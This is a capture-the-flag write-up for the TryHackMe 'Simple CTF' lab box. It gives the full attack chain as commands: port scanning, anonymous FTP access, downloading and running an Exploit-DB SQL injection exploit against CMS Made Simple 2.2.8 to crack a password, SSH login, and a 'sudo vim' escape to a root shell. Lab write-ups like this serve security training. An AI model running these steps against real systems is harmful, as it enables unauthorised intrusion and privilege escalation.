TryHackMe Simple CTF Writeup
This writeup will help you solve the Simple CTF box on TryHackMe. Before we start enumerating the box, add the following line to your /etc/hosts file.
echo "<box_ip> simple.thm" >> /etc/hosts
TryHackMe Simple CTF – Enumeration
As per usual, we start by running a port scan on the host using nmap. The sC and sV flags indicate that basic vulnerability scripts are executed against the target and that the port scan tries to find version information.
nmap -sV -sC simple.thm
You can see the output of this scan below:
PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.9.8.169 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST | http-robots.txt: 2 disallowed entries |_/ /openemr-5_0_1_3 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 2222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCj5RwZ5K4QU12jUD81IxGPdEmWFigjRwFNM2pVBCiIPWiMb+R82pdw5dQPFY0JjjicSysFN3pl8ea2L8acocd/7zWke6ce50tpHaDs8OdBYLfpkh+OzAsDwVWSslgKQ7rbi/ck1FF1LIgY7UQdo5FWiTMap7vFnsT/WHL3HcG5Q+el4glnO4xfMMvbRar5WZd4N0ZmcwORyXrEKvulWTOBLcoMGui95Xy7XKCkvpS9RCpJgsuNZ/oau9cdRs0gDoDLTW4S7OI9Nl5obm433k+7YwFeoLnuZnCzegEhgq/bpMo+fXTb/4ILI5bJHJQItH2Ae26iMhJjlFsMqQw0FzLf | 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM6Q8K/lDR5QuGRzgfrQSDPYBEBcJ+/2YolisuiGuNIF+1FPOweJy9esTtstZkG3LPhwRDggCp4BP+Gmc92I3eY= | 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2I73yryK/Q6UFyvBBMUJEfznlIdBXfnrEqQ3lWdymK Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
There are 3 open ports. Port 21 is used for FTP, port 2222 is used for SSH and port 80 serves a web server. Since anonymous login is available, we start by checking the FTP server.
FTP server
Use the following command to log into the FTP server.
ftp simple.thm
You now have to provide the username: anonymous, and you should be in right after. Within the pub directory resides the ForMitch.txt file. You can acquire this file by running the following command:
cd pub mget ForMitch.txt
Terminate the connection to the FTP server and read the content of the just acquired text file. The message reads as follows:
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
We keep in mind this message and start enumerating the web server!
TryHackMe Simple CTF – Web server
When we browse to http://simple.thm/ in our browser, we can see the following page:
the page seems to be the default Apache web page. We can use gobuster to find hidden files and directories. Run the following command:
gobuster dir -u http://simple.thm/ -w /usr/share/wordlists/common.txt
The outcome is listed below.
/.hta (Status: 403) /.htpasswd (Status: 403) /.htaccess (Status: 403) /index.html (Status: 200) /robots.txt (Status: 200) /server-status (Status: 403) /simple (Status: 301)
The most promising directory is the simple directory. Browse to http://simple.thm/simple/ to find the following page.
It seems like we found the default page of a CMS called CMS Made Simple. At the bottom of the page, we find out that we are dealing with CMS Made Simple version 2.2.8. This version is vulnerable to a SQL injection vulnerability. You can find the exploit here. Run the following commands to perform the exploit:
wget https://www.exploit-db.com/exploits/46635 -O 46635.py python 46635.py -u http://simple.thm/simple/ -c -w /usr/share/wordlists/rockyou.txt
Wait some minutes for this exploit to complete. In the end, you should see the following output:
[+] Salt for password found: REDACTED [+] Username found: mitch [+] Email found: [email protected] [+] Password found: REDACTED [+] Password cracked: REDACTED
We find a username + password combination. We can try to use these credentials to log into the server using SSH. Run the following command:
ssh -p 2222 [email protected]
Provide the just found password, and we got ourselves access to the server! The user.txt resides in the /home/mitch/ directory.
TryHackMe Simple CTF – Root Flag
The first command we try to find the root.txt flag is the sudo -l command. This command lists the commands we can execute as other users. The output after executing this command is listed below.
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim
It seems like mitch can execute the vim command as the root user. Browse to this website to find out how we can acquire a shell using vim. Run the following command to obtain root privileges.
sudo vim -c ':!/bin/bash'
The root.txt flag resides in the /root directory.
The Simple CTF box on TryHackMe was fun to root! This box is designed for starters to get familiar with some basic principles of cybersecurity.
